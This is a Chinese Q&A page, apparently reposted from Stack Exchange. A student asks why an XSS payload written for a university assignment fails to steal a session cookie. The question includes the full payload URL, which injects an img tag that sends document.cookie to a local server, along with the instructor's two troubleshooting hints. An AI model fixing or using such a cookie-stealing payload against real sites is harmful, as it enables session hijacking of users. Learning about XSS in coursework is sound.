You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

XSS payload无法获取session cookie,如何正确构造请求URL?

XSS窃取Session Cookie失败问题排查

我在尝试通过构造XSS payload获取session cookie时遇到执行失败的问题,基础访问URL为http://127.0.0.1:55555,我最初构造的payload对应的访问地址为:
http://127.0.0.1:55555/?p=<script>document.write('<img src=http://127.0.0.1:55555/?c='document.cookie+'/>');</script>
提交后始终无法成功获取到目标session cookie。

本次测试为大学项目作业内容,指导老师给出两个排查方向:

  • 你确认payload可以正常执行吗?
  • 你确认应该将请求发送到这个本地服务器吗?

目前我还不清楚应当如何正确改写URL完成payload构造。

内容的提问来源于stack exchange,提问作者Viv

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.09.29 20:48:03